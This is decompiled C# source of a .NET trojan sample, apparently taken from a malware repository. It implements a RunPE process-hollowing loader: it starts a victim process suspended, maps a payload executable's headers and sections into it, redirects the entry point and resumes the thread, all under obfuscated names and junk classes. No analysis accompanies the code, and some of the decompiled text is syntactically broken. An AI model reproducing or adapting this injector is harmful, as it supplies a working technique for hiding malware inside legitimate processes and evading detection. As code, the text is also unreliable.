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954 lines
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// Decompiled with JetBrains decompiler
// Type: dofgdgpd9d0s
// Assembly: PwnzTest, Version=, Culture=neutral, PublicKeyToken=null
// MVID: 631E39F5-1CA8-4C07-9995-19D9DD762690
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Llac.aujq-2899a5ffe6277f7b0edb8caed92e38de7a399fdb7bb9c5805376f2b5b6aeb2ec.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Runtime.InteropServices;
internal class dofgdgpd9d0s
public const int CONTEXT_X86 = 65536;
public const int CONTEXT86_CONTROL = 65537;
public const int CONTEXT86_INTEGER = 65538;
public const int CONTEXT86_SEGMENTS = 65540;
public const int CONTEXT86_FLOATING_POINT = 65544;
public const int CONTEXT86_DEBUG_REGISTERS = 65552;
public const int CONTEXT86_FULL = 65543;
public const int CREATE_SUSPENDED = 4;
public const long MEM_COMMIT = 4096;
public const long MEM_RESERVE = 8192;
public const long PAGE_NOCACHE = 512;
public const long PAGE_EXECUTE_READWRITE = 64;
public const long PAGE_EXECUTE_WRITECOPY = 128;
public const long PAGE_EXECUTE_READ = 32;
public const long PAGE_EXECUTE = 16;
public const long PAGE_WRITECOPY = 8;
public const long PAGE_NOACCESS = 1;
public const long PAGE_READWRITE = 4;
private const int GENERIC_READ = -2147483648;
private const uint FILE_SHARE_READ = 1;
private const uint OPEN_EXISTING = 3;
private const uint FILE_ATTRIBUTE_NORMAL = 128;
private const int INVALID_HANDLE_VALUE = -1;
private const uint PAGE_READONLY = 2;
private const uint FILE_MAP_READ = 4;
private const ushort IMAGE_DOS_SIGNATURE = 23117;
private const int RT_VERSION = 16;
private static extern uint dfioju8f9fdh(IntPtr gi990f90idhdh);
private static extern bool dfi3435oju8f9fdh(
IntPtr gi990f90idhdh,
ref dofgdgpd9d0s.CONTEXT kf90ggfi90fhhfxz);
private static extern bool joigu89fd89ugdf(
IntPtr gi990f90idhdh,
ref dofgdgpd9d0s.CONTEXT kf90ggfi90fhhfxz);
private static extern int ki90f9disfdfg(string kf90ggfi94430fhhfxz);
private static extern bool ki90f9dfddfdisfdfg(
string kf90gxccgfi94430fhhfxz,
string yhtg34sdf,
ref dofgdgpd9d0s.SECURITY_ATTRIBUTES yhtgrttr34sdf,
ref dofgdgpd9d0s.SECURITY_ATTRIBUTES yhtgrttrfghf34sdf,
bool jmnjt53tsegetd,
uint jmnjt53tsegetfgfgd,
IntPtr jmnjt53tsefgfggetfgfgd,
string jmnjt53tsefgfggetfghffhhgfgd,
[In] ref dofgdgpd9d0s.STARTUPINFO gh654gfdhdf,
out dofgdgpd9d0s.PROCESS_INFORMATION gh6yy64tgdghhh);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall, SetLastError = true)]
public static extern bool ki90f9dfddfdisf3r4fdfg(
IntPtr fdgi9090gdgd,
IntPtr jfg89fdg8u9df8u9h,
byte[] jfg89fdfddfdg8u9df8u9h,
int jfg89fdfddfcvcvcdg8u9df8u9h,
out int kopfg0990iddfhzzx);
[DllImport("kernel32.dll", EntryPoint = "ki90f9dfddfdisf3r4fdfg", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall, SetLastError = true)]
public static extern bool nnjv89vsdfsggsa(
IntPtr fdgi9090gdgd,
IntPtr jfg89fdg8u9df8u9h,
IntPtr jfg89fdfddfdg8u9df8u9h,
int jfg89fdfddfcvcvcdg8u9df8u9h,
out int kopfg0990iddfhzzx);
public static extern int nnjv89v45sdfsgggsa(
IntPtr fdgi9090gdgd,
int jfg89fdg8u9df8u9h,
ref IntPtr jfg89fdfddfdg8u9df8u9h,
int gi90ffdhfiozxcdf,
ref int gi90fffgfgfdhfiozxcdf);
public static extern long nn34fjv89v45sdfsgggsa(IntPtr fdgi9090gdgd, IntPtr opfg90df90ihdh);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr nn34fjv89v45sdfsg45tggsa(
IntPtr fdgi9090gdgd,
IntPtr opfdfdg90df90ihdh,
uint opfdfdg90dffgfg0ihdh,
uint fopkopiowjicbbv4f,
uint fopkopiowj3443icbbv4f);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
public static extern int kioioijsfu89dg(
IntPtr fdgi9090gdgd,
IntPtr opfdfdg90df90ihdh,
UIntPtr opfdfdg90dffgfg0ihdh,
UIntPtr xggvxcgvxcdgvcdh98cx,
[Out] uint xggvxcgvxcdg34545vcdh98cx);
public static void ccvxbfr54fd(byte[] b, string sVictim)
int num1 = 1;
int num2 = 0;
dofgdgpd9d0s.CONTEXT kf90ggfi90fhhfxz = new dofgdgpd9d0s.CONTEXT();
int num3 = 0;
dofgdgpd9d0s.PROCESS_INFORMATION gh6yy64tgdghhh = new dofgdgpd9d0s.PROCESS_INFORMATION();
int num4 = 0;
dofgdgpd9d0s.STARTUPINFO gh654gfdhdf = new dofgdgpd9d0s.STARTUPINFO();
dofgdgpd9d0s.SECURITY_ATTRIBUTES yhtgrttr34sdf = new dofgdgpd9d0s.SECURITY_ATTRIBUTES();
dofgdgpd9d0s.SECURITY_ATTRIBUTES yhtgrttrfghf34sdf = new dofgdgpd9d0s.SECURITY_ATTRIBUTES();
GCHandle gcHandle = GCHandle.Alloc((object) b, GCHandleType.Pinned);
num1 = num2 != num3 ? checked (num4 - 35878257) : checked (num4 + num3);
IntPtr ptr = gcHandle.AddrOfPinnedObject();
int int32 = ptr.ToInt32();
dofgdgpd9d0s.IMAGE_DOS_HEADER imageDosHeader1;
object structure1 = Marshal.PtrToStructure(gcHandle.AddrOfPinnedObject(), imageDosHeader1.GetType());
dofgdgpd9d0s.IMAGE_DOS_HEADER imageDosHeader2;
dofgdgpd9d0s.IMAGE_DOS_HEADER imageDosHeader3 = structure1 != null ? (dofgdgpd9d0s.IMAGE_DOS_HEADER) structure1 : imageDosHeader2;
IntPtr jmnjt53tsefgfggetfgfgd;
if (-(dofgdgpd9d0s.ki90f9dfddfdisfdfg((string) null, sVictim, ref yhtgrttr34sdf, ref yhtgrttrfghf34sdf, false, 4U, jmnjt53tsefgfggetfgfgd, (string) null, ref gh654gfdhdf, out gh6yy64tgdghhh) ? 1 : 0) == 0)
ptr = new IntPtr(checked (int32 + imageDosHeader3.e_lfanew));
dofgdgpd9d0s.IMAGE_NT_HEADERS imageNtHeaders1;
object structure2 = Marshal.PtrToStructure(ptr, imageNtHeaders1.GetType());
dofgdgpd9d0s.IMAGE_NT_HEADERS imageNtHeaders2;
dofgdgpd9d0s.IMAGE_NT_HEADERS imageNtHeaders3 = structure2 != null ? (dofgdgpd9d0s.IMAGE_NT_HEADERS) structure2 : imageNtHeaders2;
gh654gfdhdf.cb = Strings.Len((object) gh654gfdhdf);
kf90ggfi90fhhfxz.ContextFlags = 65538U;
if (imageNtHeaders3.Signature != 17744U | imageDosHeader3.e_magic != (ushort) 23117)
num1 = num2 != num3 ? checked (num4 - 35878257) : checked (num4 + num3);
int num5 = dofgdgpd9d0s.dfi3435oju8f9fdh(gh6yy64tgdghhh.gi990f90idhdh, ref kf90ggfi90fhhfxz) ? 1 : 0;
IntPtr fdgi9090gdgd1 = gh6yy64tgdghhh.fdgi9090gdgd;
int jfg89fdg8u9df8u9h1 = checked ((int) ((long) kf90ggfi90fhhfxz.Ebx + 8L));
long num6;
ptr = (IntPtr) num6;
ref IntPtr local1 = ref ptr;
int num7 = 0;
ref int local2 = ref num7;
int num8 = dofgdgpd9d0s.nnjv89v45sdfsgggsa(fdgi9090gdgd1, jfg89fdg8u9df8u9h1, ref local1, 4, ref local2);
long num9 = (long) ptr;
int num10 = num8 >= 0 ? 1 : 0;
if ((num5 & num10 & (dofgdgpd9d0s.nn34fjv89v45sdfsgggsa(gh6yy64tgdghhh.fdgi9090gdgd, (IntPtr) num9) >= 0L ? 1 : 0)) == 0)
uint num11 = checked ((uint) (int) dofgdgpd9d0s.nn34fjv89v45sdfsg45tggsa(gh6yy64tgdghhh.fdgi9090gdgd, (IntPtr) (long) imageNtHeaders3.OptionalHeader.ImageBase, imageNtHeaders3.OptionalHeader.SizeOfImage, 12288U, 4U));
if (num11 == 0U)
num1 = num2 != num3 ? checked (num4 - 35878257) : checked (num4 + num3);
IntPtr fdgi9090gdgd2 = gh6yy64tgdghhh.fdgi9090gdgd;
IntPtr jfg89fdg8u9df8u9h2 = (IntPtr) (long) num11;
byte[] jfg89fdfddfdg8u9df8u9h1 = b;
int sizeOfHeaders = checked ((int) imageNtHeaders3.OptionalHeader.SizeOfHeaders);
uint num12;
int num13 = checked ((int) num12);
ref int local3 = ref num13;
dofgdgpd9d0s.ki90f9dfddfdisf3r4fdfg(fdgi9090gdgd2, jfg89fdg8u9df8u9h2, jfg89fdfddfdg8u9df8u9h1, sizeOfHeaders, out local3);
uint num14 = checked ((uint) num13);
long num15 = (long) checked (imageDosHeader3.e_lfanew + 248);
int num16 = checked ((int) imageNtHeaders3.FileHeader.NumberOfSections - 1);
int num17 = 0;
while (num17 <= num16)
num1 = num2 != num3 ? checked (num4 - 35878257) : checked (num4 + num3);
ptr = new IntPtr(checked ((long) int32 + num15 + (long) (num17 * 40)));
dofgdgpd9d0s.IMAGE_SECTION_HEADER imageSectionHeader1;
object structure3 = Marshal.PtrToStructure(ptr, imageSectionHeader1.GetType());
dofgdgpd9d0s.IMAGE_SECTION_HEADER imageSectionHeader2;
imageSectionHeader1 = structure3 != null ? (dofgdgpd9d0s.IMAGE_SECTION_HEADER) structure3 : imageSectionHeader2;
num1 = num2 != num3 ? checked (num4 - 35878257) : checked (num4 + num3);
byte[] numArray = new byte[checked ((int) imageSectionHeader1.SizeOfRawData + 1)];
int num18 = checked ((int) ((long) imageSectionHeader1.SizeOfRawData - 1L));
int index = 0;
while (index <= num18)
num1 = num2 != num3 ? checked (num4 - 35878257) : checked (num4 + num3);
numArray[index] = b[checked ((int) ((long) imageSectionHeader1.PointerToRawData + (long) index))];
num1 = num2 != num3 ? checked (num4 - 35878257) : checked (num4 + num3);
checked { ++index; }
IntPtr fdgi9090gdgd3 = gh6yy64tgdghhh.fdgi9090gdgd;
IntPtr jfg89fdg8u9df8u9h3 = (IntPtr) (long) checked (num11 + imageSectionHeader1.VirtualAddress);
byte[] jfg89fdfddfdg8u9df8u9h2 = numArray;
int sizeOfRawData = checked ((int) imageSectionHeader1.SizeOfRawData);
num13 = checked ((int) num14);
ref int local4 = ref num13;
dofgdgpd9d0s.ki90f9dfddfdisf3r4fdfg(fdgi9090gdgd3, jfg89fdg8u9df8u9h3, jfg89fdfddfdg8u9df8u9h2, sizeOfRawData, out local4);
num14 = checked ((uint) num13);
num1 = num2 != num3 ? checked (num4 - 35878257) : checked (num4 + num3);
dofgdgpd9d0s.kioioijsfu89dg(gh6yy64tgdghhh.fdgi9090gdgd, (IntPtr) (long) checked (num11 + imageSectionHeader1.VirtualAddress), (UIntPtr) imageSectionHeader1.Misc.VirtualSize, (UIntPtr) checked ((ulong) dofgdgpd9d0s.jiojiofgjibx((long) imageSectionHeader1.ioiofjg89dfu89fg)), checked ((uint) num9));
checked { ++num17; }
byte[] bytes = BitConverter.GetBytes(num11);
IntPtr fdgi9090gdgd4 = gh6yy64tgdghhh.fdgi9090gdgd;
IntPtr jfg89fdg8u9df8u9h4 = (IntPtr) checked ((long) kf90ggfi90fhhfxz.Ebx + 8L);
byte[] jfg89fdfddfdg8u9df8u9h3 = bytes;
num13 = checked ((int) num14);
ref int local5 = ref num13;
dofgdgpd9d0s.ki90f9dfddfdisf3r4fdfg(fdgi9090gdgd4, jfg89fdg8u9df8u9h4, jfg89fdfddfdg8u9df8u9h3, 4, out local5);
num12 = checked ((uint) num13);
num1 = num2 != num3 ? checked (num4 - 35878257) : checked (num4 + num3);
kf90ggfi90fhhfxz.Eax = checked (num11 + imageNtHeaders3.OptionalHeader.AddressOfEntryPoint);
dofgdgpd9d0s.joigu89fd89ugdf(gh6yy64tgdghhh.gi990f90idhdh, ref kf90ggfi90fhhfxz);
num1 = num2 != num3 ? checked (num4 - 35878257) : checked (num4 + num3);
int num19 = (int) dofgdgpd9d0s.dfioju8f9fdh(gh6yy64tgdghhh.gi990f90idhdh);
if (num2 == num3)
num1 = checked (num4 + num3);
num1 = checked (num4 - 35878257);
private static long jiojiofgjibx(long ioiofjg89dfu89fg) => Conversions.ToLong(new object[8]
(object) 1L,
(object) 16L,
(object) 2U,
(object) 32L,
(object) 4L,
(object) 64L,
(object) 4L,
(object) 64L
}[checked ((int) dofgdgpd9d0s.fi9g9ffgfgdh9h(ioiofjg89dfu89fg, 29L))]);
private static long fi9g9ffgfgdh9h(long opgk90fhgfj, long ikfigf90g89fgug)
int x = checked (4 - 2);
return checked ((long) Math.Round(unchecked (dofgdgpd9d0s.fi9g9fdh9h(opgk90fhgfj) / Math.Pow((double) x, (double) ikfigf90g89fgug))));
private static double fi9g9fdh9h(long opgkdfdf90fhgfj)
int num1 = 0;
int num2 = num1 != 29853 ? checked (num1 - 458743) : checked (num1 + 345);
double num3;
if (opgkdfdf90fhgfj < 0L)
num3 = (double) opgkdfdf90fhgfj + 4294967296.0;
int num4 = num2 != 29853 ? checked (num2 - 458743) : checked (num2 + 345);
num3 = (double) opgkdfdf90fhgfj;
return num3;
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct STARTUPINFO
public int cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public int dwX;
public int dwY;
public int dwXSize;
public int dwYSize;
public int dwXCountChars;
public int dwYCountChars;
public int dwFillAttribute;
public int dwFlags;
public short wShowWindow;
public short cbReserved2;
public int lpReserved2;
public int hStdInput;
public int hStdOutput;
public int hStdError;
public class kpfdvxxbdvbcbcfg9089df
private string YaJAh92LgGExUle0UPVgyQa51S77S4gdsiud;
private int wp8A1qWD3CNa3woxNna1nYc96jgdikfd;
private int KRyplOPki545hl6d4B8OKtZI6ODY7Ba616pqDm1OFfxgjgijgigd;
public kpfdvxxbdvbcbcfg9089df()
this.YaJAh92LgGExUle0UPVgyQa51S77S4gdsiud = "dfkodfpogjdf";
this.wp8A1qWD3CNa3woxNna1nYc96jgdikfd = 0;
this.KRyplOPki545hl6d4B8OKtZI6ODY7Ba616pqDm1OFfxgjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.YaJAh92LgGExUle0UPVgyQa51S77S4gdsiud) > 0.0)
checked { ++this.wp8A1qWD3CNa3woxNna1nYc96jgdikfd; }
checked { this.KRyplOPki545hl6d4B8OKtZI6ODY7Ba616pqDm1OFfxgjgijgigd += 3259285; }
public IntPtr fdgi9090gdgd;
public IntPtr gi990f90idhdh;
public int dwProcessId;
public int dwThreadId;
public class ffjg211222duinbnvvhgud
private string RDTES7Fxek795xNeBJgdsiud;
private int L021arDYe5JfZftDT8358jgdikfd;
private int OWlO29T86mvOfHEgjgijgigd;
public ffjg211222duinbnvvhgud()
this.RDTES7Fxek795xNeBJgdsiud = "dfkodfpogjdf";
this.L021arDYe5JfZftDT8358jgdikfd = 0;
this.OWlO29T86mvOfHEgjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.RDTES7Fxek795xNeBJgdsiud) > 0.0)
checked { ++this.L021arDYe5JfZftDT8358jgdikfd; }
checked { this.OWlO29T86mvOfHEgjgijgigd += 3259285; }
private struct IMAGE_DOS_HEADER
public ushort e_magic;
public ushort e_cblp;
public ushort e_cp;
public ushort e_crlc;
public ushort e_cparhdr;
public ushort e_minalloc;
public ushort e_maxalloc;
public ushort e_ss;
public ushort e_sp;
public ushort e_csum;
public ushort e_ip;
public ushort e_cs;
public ushort e_lfarlc;
public ushort e_ovno;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] e_res1;
public ushort e_oemid;
public ushort e_oeminfo;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] e_res2;
public int e_lfanew;
public class ffxcvvjg211222duihgud
private string R09F4H38Za3s9iG38NT930ogdsiud;
private int GcSKaII0m5GShenGQq1qm545JPzZs0A80J1J1jgdikfd;
private int O851F5IgKlp82q17x4w4X640xYTyagjgijgigd;
public ffxcvvjg211222duihgud()
this.R09F4H38Za3s9iG38NT930ogdsiud = "dfkodfpogjdf";
this.GcSKaII0m5GShenGQq1qm545JPzZs0A80J1J1jgdikfd = 0;
this.O851F5IgKlp82q17x4w4X640xYTyagjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.R09F4H38Za3s9iG38NT930ogdsiud) > 0.0)
checked { ++this.GcSKaII0m5GShenGQq1qm545JPzZs0A80J1J1jgdikfd; }
checked { this.O851F5IgKlp82q17x4w4X640xYTyagjgijgigd += 3259285; }
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct VS_VERSIONINFO
public ushort wLength;
public ushort wValueLength;
public ushort wType;
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 15)]
public string szKey;
public ushort Padding1;
public class ffjg23525611222duihgud
private string SfG1P6PFxVgc0538gdsiud;
private int wW6aSpWazKPjgdikfd;
private int XYKz0KzxV1xtQfuiRgjgijgigd;
public ffjg23525611222duihgud()
this.SfG1P6PFxVgc0538gdsiud = "dfkodfpogjdf";
this.wW6aSpWazKPjgdikfd = 0;
this.XYKz0KzxV1xtQfuiRgjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.SfG1P6PFxVgc0538gdsiud) > 0.0)
checked { ++this.wW6aSpWazKPjgdikfd; }
checked { this.XYKz0KzxV1xtQfuiRgjgijgigd += 3259285; }
public int nLength;
public IntPtr lpSecurityDescriptor;
public int bInheritHandle;
private struct VS_FIXEDFILEINFO
public uint dwSignature;
public uint dwStrucVersion;
public uint dwFileVersionMS;
public uint dwFileVersionLS;
public uint dwProductVersionMS;
public uint dwProductVersionLS;
public uint dwFileFlagsMask;
public uint dwFileFlags;
public uint dwFileOS;
public uint dwFileType;
public uint dwFileSubtype;
public uint dwFileDateMS;
public uint dwFileDateLS;
public class ffjg211222duhjihgud
private string vUw3D71l759jixA7N3q44gdsiud;
private int matzab81FAKOmAURfLIE0s45423c8cn58r26VG507S0093jgdikfd;
private int yF98RnCCCZl1Sby5wDANCc1z9vjNBCte849F6gjgijgigd;
public ffjg211222duhjihgud()
this.vUw3D71l759jixA7N3q44gdsiud = "dfkodfpogjdf";
this.matzab81FAKOmAURfLIE0s45423c8cn58r26VG507S0093jgdikfd = 0;
this.yF98RnCCCZl1Sby5wDANCc1z9vjNBCte849F6gjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.vUw3D71l759jixA7N3q44gdsiud) > 0.0)
checked { ++this.matzab81FAKOmAURfLIE0s45423c8cn58r26VG507S0093jgdikfd; }
checked { this.yF98RnCCCZl1Sby5wDANCc1z9vjNBCte849F6gjgijgigd += 3259285; }
public class vbbu9fdvfgfgdf8b
private string h7ZQFBI2s5dlK4g029MlvMgszwgdsiud;
private int VZm214C40FYw90Yv9Zjgdikfd;
private int a7TnJOT2x6Zn174Y62LE3541oAIaMA8qF6TF69Y2rKgjgijgigd;
public vbbu9fdvfgfgdf8b()
this.h7ZQFBI2s5dlK4g029MlvMgszwgdsiud = "dfkodfpogjdf";
this.VZm214C40FYw90Yv9Zjgdikfd = 0;
this.a7TnJOT2x6Zn174Y62LE3541oAIaMA8qF6TF69Y2rKgjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.h7ZQFBI2s5dlK4g029MlvMgszwgdsiud) > 0.0)
checked { ++this.VZm214C40FYw90Yv9Zjgdikfd; }
checked { this.a7TnJOT2x6Zn174Y62LE3541oAIaMA8qF6TF69Y2rKgjgijgigd += 3259285; }
public struct FLOATING_SAVE_AREA
public uint ControlWord;
public uint StatusWord;
public uint TagWord;
public uint ErrorOffset;
public uint ErrorSelector;
public uint DataOffset;
public uint DataSelector;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] RegisterArea;
public uint Cr0NpxState;
public class ffjgio89vjhnihgud
private string x3VRg6LE76E5KZQp7C744F6KHeU73P2s25CA46T5Qgdsiud;
private int yo8hpS9msdYgaSQjgdikfd;
private int joky88q05Dgjgijgigd;
public ffjgio89vjhnihgud()
this.x3VRg6LE76E5KZQp7C744F6KHeU73P2s25CA46T5Qgdsiud = "dfkodfpogjdf";
this.yo8hpS9msdYgaSQjgdikfd = 0;
this.joky88q05Dgjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.x3VRg6LE76E5KZQp7C744F6KHeU73P2s25CA46T5Qgdsiud) > 0.0)
checked { ++this.yo8hpS9msdYgaSQjgdikfd; }
checked { this.joky88q05Dgjgijgigd += 3259285; }
public struct CONTEXT
public uint ContextFlags;
public uint Dr0;
public uint Dr1;
public uint Dr2;
public uint Dr3;
public uint Dr6;
public uint Dr7;
public dofgdgpd9d0s.FLOATING_SAVE_AREA FloatSave;
public uint SegGs;
public uint SegFs;
public uint SegEs;
public uint SegDs;
public uint Edi;
public uint Esi;
public uint Ebx;
public uint Edx;
public uint Ecx;
public uint Eax;
public uint Ebp;
public uint Eip;
public uint SegCs;
public uint EFlags;
public uint Esp;
public uint SegSs;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] ExtendedRegisters;
public ushort Magic;
public byte MajorLinkerVersion;
public byte MinorLinkerVersion;
public uint SizeOfCode;
public uint SizeOfInitializedData;
public uint SizeOfUninitializedData;
public uint AddressOfEntryPoint;
public uint BaseOfCode;
public uint BaseOfData;
public uint ImageBase;
public uint SectionAlignment;
public uint FileAlignment;
public ushort MajorOperatingSystemVersion;
public ushort MinorOperatingSystemVersion;
public ushort MajorImageVersion;
public ushort MinorImageVersion;
public ushort MajorSubsystemVersion;
public ushort MinorSubsystemVersion;
public uint Win32VersionValue;
public uint SizeOfImage;
public uint SizeOfHeaders;
public uint CheckSum;
public ushort Subsystem;
public ushort DllCharacteristics;
public uint SizeOfStackReserve;
public uint SizeOfStackCommit;
public uint SizeOfHeapReserve;
public uint SizeOfHeapCommit;
public uint LoaderFlags;
public uint NumberOfRvaAndSizes;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public dofgdgpd9d0s.IMAGE_DATA_DIRECTORY[] DataDirectory;
public class vbbu9fdvbbcvvfgfgdf8b
private string P4IKZY3qwFG2Xxgdsiud;
private int YaKrAKT2NbDD9m1UDjx09W8N9K8VkfY1jgdikfd;
private int lJrTcXD8698awOyZgjgijgigd;
public vbbu9fdvbbcvvfgfgdf8b()
this.P4IKZY3qwFG2Xxgdsiud = "dfkodfpogjdf";
this.YaKrAKT2NbDD9m1UDjx09W8N9K8VkfY1jgdikfd = 0;
this.lJrTcXD8698awOyZgjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.P4IKZY3qwFG2Xxgdsiud) > 0.0)
checked { ++this.YaKrAKT2NbDD9m1UDjx09W8N9K8VkfY1jgdikfd; }
checked { this.lJrTcXD8698awOyZgjgijgigd += 3259285; }
public class fgj8nmhmhmm9gdfhdfg
private string Ry4R21gdsiud;
private int yJ2C0553CY2MAxu0Rc0q294jgdikfd;
private int zuRA317S12C46g3P1nA3R7gjgijgigd;
public fgj8nmhmhmm9gdfhdfg()
this.Ry4R21gdsiud = "dfkodfpogjdf";
this.yJ2C0553CY2MAxu0Rc0q294jgdikfd = 0;
this.zuRA317S12C46g3P1nA3R7gjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.Ry4R21gdsiud) > 0.0)
checked { ++this.yJ2C0553CY2MAxu0Rc0q294jgdikfd; }
checked { this.zuRA317S12C46g3P1nA3R7gjgijgigd += 3259285; }
public struct IMAGE_FILE_HEADER
public ushort Machine;
public ushort NumberOfSections;
public uint TimeDateStamp;
public uint PointerToSymbolTable;
public uint NumberOfSymbols;
public ushort SizeOfOptionalHeader;
public ushort ioiofjg89dfu89fg;
public class gfufsfuhgvzsduhsuiofshd
private string Z5x1P58f3hGfq3fkH9rLL59DDIK7R9494r5gZgdsiud;
private int tNn0Bd3W7M66Ng41LFDkJwj3654D4jgdikfd;
private int Bg1VEV3gjgijgigd;
public gfufsfuhgvzsduhsuiofshd()
this.Z5x1P58f3hGfq3fkH9rLL59DDIK7R9494r5gZgdsiud = "dfkodfpogjdf";
this.tNn0Bd3W7M66Ng41LFDkJwj3654D4jgdikfd = 0;
this.Bg1VEV3gjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.Z5x1P58f3hGfq3fkH9rLL59DDIK7R9494r5gZgdsiud) > 0.0)
checked { ++this.tNn0Bd3W7M66Ng41LFDkJwj3654D4jgdikfd; }
checked { this.Bg1VEV3gjgijgigd += 3259285; }
public uint VirtualAddress;
public uint Size;
public struct IMAGE_NT_HEADERS
public uint Signature;
public dofgdgpd9d0s.IMAGE_FILE_HEADER FileHeader;
public dofgdgpd9d0s.IMAGE_OPTIONAL_HEADER32 OptionalHeader;
public struct Misc
public uint PhysicalAddress;
public uint VirtualSize;
public byte Name;
public dofgdgpd9d0s.Misc Misc;
public uint VirtualAddress;
public uint SizeOfRawData;
public uint PointerToRawData;
public uint PointerToRelocations;
public uint PointerToLinenumbers;
public ushort NumberOfRelocations;
public ushort NumberOfLinenumbers;
public uint ioiofjg89dfu89fg;
public class fgj89gdfhdfg
private string kYV1d3Ubo3nW3oR9DNTnWC7A1h9weRgdsiud;
private int E21S91Ajgdikfd;
private int M0M9O2fgjgijgigd;
public fgj89gdfhdfg()
this.kYV1d3Ubo3nW3oR9DNTnWC7A1h9weRgdsiud = "dfkodfpogjdf";
this.E21S91Ajgdikfd = 0;
this.M0M9O2fgjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.kYV1d3Ubo3nW3oR9DNTnWC7A1h9weRgdsiud) > 0.0)
checked { ++this.E21S91Ajgdikfd; }
checked { this.M0M9O2fgjgijgigd += 3259285; }
public class fgj89gdfhdfg
private string X1VUOI1193hK4R83uEC6G4E7kHv6kq4gdsiud;
private int J8EvbcO1tHnrbt7W1Tiq52Tbf9f8BE884YZ3jgdikfd;
private int Q8j4D0jmsdw634vmr706SsWd42Fgjgijgigd;
public fgj89gdfhdfg()
this.X1VUOI1193hK4R83uEC6G4E7kHv6kq4gdsiud = "dfkodfpogjdf";
this.J8EvbcO1tHnrbt7W1Tiq52Tbf9f8BE884YZ3jgdikfd = 0;
this.Q8j4D0jmsdw634vmr706SsWd42Fgjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.X1VUOI1193hK4R83uEC6G4E7kHv6kq4gdsiud) > 0.0)
checked { ++this.J8EvbcO1tHnrbt7W1Tiq52Tbf9f8BE884YZ3jgdikfd; }
checked { this.Q8j4D0jmsdw634vmr706SsWd42Fgjgijgigd += 3259285; }
public class h90fdi9s90if
private string YO8Y5Q9oEl4g3VU4QCI0sLQ5RMmMb4418g3Yn1zFo437oggE9gdsiud;
private int j64AS1zbTja7W3jgdikfd;
private int FKTS9RTOxEEmem3481tGjUsG191AW1o6gjgijgigd;
public h90fdi9s90if()
this.YO8Y5Q9oEl4g3VU4QCI0sLQ5RMmMb4418g3Yn1zFo437oggE9gdsiud = "dfkodfpogjdf";
this.j64AS1zbTja7W3jgdikfd = 0;
this.FKTS9RTOxEEmem3481tGjUsG191AW1o6gjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.YO8Y5Q9oEl4g3VU4QCI0sLQ5RMmMb4418g3Yn1zFo437oggE9gdsiud) > 0.0)
checked { ++this.j64AS1zbTja7W3jgdikfd; }
checked { this.FKTS9RTOxEEmem3481tGjUsG191AW1o6gjgijgigd += 3259285; }
public class ki90gfi90i90dg
private string F1831unnJPj6Sh1TNGFPHrgdsiud;
private int hDIRw4cHq9o5Njgdikfd;
private int de27iP9Te6CMt928lES2hzb9vIwgjgijgigd;
public ki90gfi90i90dg()
this.F1831unnJPj6Sh1TNGFPHrgdsiud = "dfkodfpogjdf";
this.hDIRw4cHq9o5Njgdikfd = 0;
this.de27iP9Te6CMt928lES2hzb9vIwgjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.F1831unnJPj6Sh1TNGFPHrgdsiud) > 0.0)
checked { ++this.hDIRw4cHq9o5Njgdikfd; }
checked { this.de27iP9Te6CMt928lES2hzb9vIwgjgijgigd += 3259285; }
public class lplpofd90igdg
private string aNMBQBu72h5Av4gdsiud;
private int ar19V3Id5RIXxw9SdG36749jgdikfd;
private int f5O82d6ZNTCDvuP0hWJ13zg97x2d749cimg8x7dk65Uj12nY4ggjgijgigd;
public lplpofd90igdg()
this.aNMBQBu72h5Av4gdsiud = "dfkodfpogjdf";
this.ar19V3Id5RIXxw9SdG36749jgdikfd = 0;
this.f5O82d6ZNTCDvuP0hWJ13zg97x2d749cimg8x7dk65Uj12nY4ggjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.aNMBQBu72h5Av4gdsiud) > 0.0)
checked { ++this.ar19V3Id5RIXxw9SdG36749jgdikfd; }
checked { this.f5O82d6ZNTCDvuP0hWJ13zg97x2d749cimg8x7dk65Uj12nY4ggjgijgigd += 3259285; }
public class pXZVPtIlCsKAxyPbEpVkVC
public object AIOgmCUiArGzuHLNxRbhkH(string frUpfEwJnskrttCrBwlsmO)
string str1 = "DgAyxDAaXVYuyJlQltIkwJ";
if (true)
str1 = "miSDZbWfIWTbgjRFzEbYtx";
string str2 = "FdNkkWKRPEJvvUAptfmaJy";
string str3 = "EIYPmtDKvzSiVGOEvvwgkJ";
if (Conversions.ToDouble(str2) == 957651.0)
str3 = Conversions.ToString(1187301);
return (object) str3;
